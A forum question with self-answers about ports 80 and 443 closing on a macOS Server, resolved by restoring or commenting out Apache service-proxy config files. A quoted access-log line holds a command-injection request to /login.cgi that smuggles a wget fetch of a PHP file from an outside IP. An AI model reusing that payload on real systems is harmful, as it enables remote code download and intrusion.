ports 80 and 443 suddenly closed on macos server

short story

Ports 80 & 443 seems to be closed on my MacOS Server (checked with Network Utility) -- cannot access any website from both local network and internet.

Have restarted the websites service & rebooted the server few times.

How to re-open ports 80 & 443?


long story

I have couple of websites hosted on my MacOS Server with the Websites service.

It was working okay until 2 days ago.

Yesterday I realised that I wasn't able to access any of the server's website neither via local network nor from the internet. After the investigation I realised that ports 80 and 443 aren't open on the server machine.

I have restarted the server couple of times, turned off and back on the Websites service, no change.

I cannot see anything too bad in the logs, apart from kinda weird request that seems to be the last access to the web server from the 'outside' world and reads as follows:

default 88.207.212.19 - - [23/Feb/2019:11:59:10 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://128.199.251.119/t.php%27$ HTTP/1.1" 302 331 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

I run the older version of Server app - 5.6.3 on MacOS 10.13.6

I have not installed/updated nor changed anything on the Server or my local network in past few days.

update

I've noticed that I have a loads of entries in the server's system log:

... com.apple.xpc.launchd[1] (com.apple.serviceproxy[__various port numbers__]): Service exited with abnormal code: 1
... com.apple.xpc.launchd[1] (com.apple.serviceproxy): Service only ran for 0 seconds. Pushing respawn out by 10 seconds.

regardless of websites service running or not


Solution 1:

Turned out that the /Library/Server/Web/Config/Proxy/apache_serviceproxy_customsites.conf file became corrupted.

Luckily, there was a backup file in the same directory /Library/Server/Web/Config/Proxy/apache_serviceproxy_customsites.conf.previous and simple swap solved the problem! (remember to restart the Websites service)

Not sure if this is relevant but it might: From Etrecheck report I’ve noticed that there was an MacOS update about the time when the problem occurred: 2019-02-19 Security Update 2019-001 (10.13.6)


Apple Support Communities thread that helped to track-down the issue: https://discussions.apple.com/thread/250188369


EDIT

The problem came back today (after 10 days).

The trick described above didn't work.

(It might have had something to do with renewing the SSL certificate this time.)


EDIT 2

This time I’ve managed to repair Website service (and open ports 80 and 443) by commenting the last line of the following config file: /Library/Server/Web/Config/Proxy/apache_serviceproxy.conf

#IncludeOptional /Library/Server/Web/Config/Proxy/apache_serviceproxy_customsites*.conf`

Not sure how long that'll last this time ;-)

EDIT 3

Still don't have a clue what was happening. Recently needed to re-enable the cutomsites in order to park couple of new domains. Server still works fine... so far.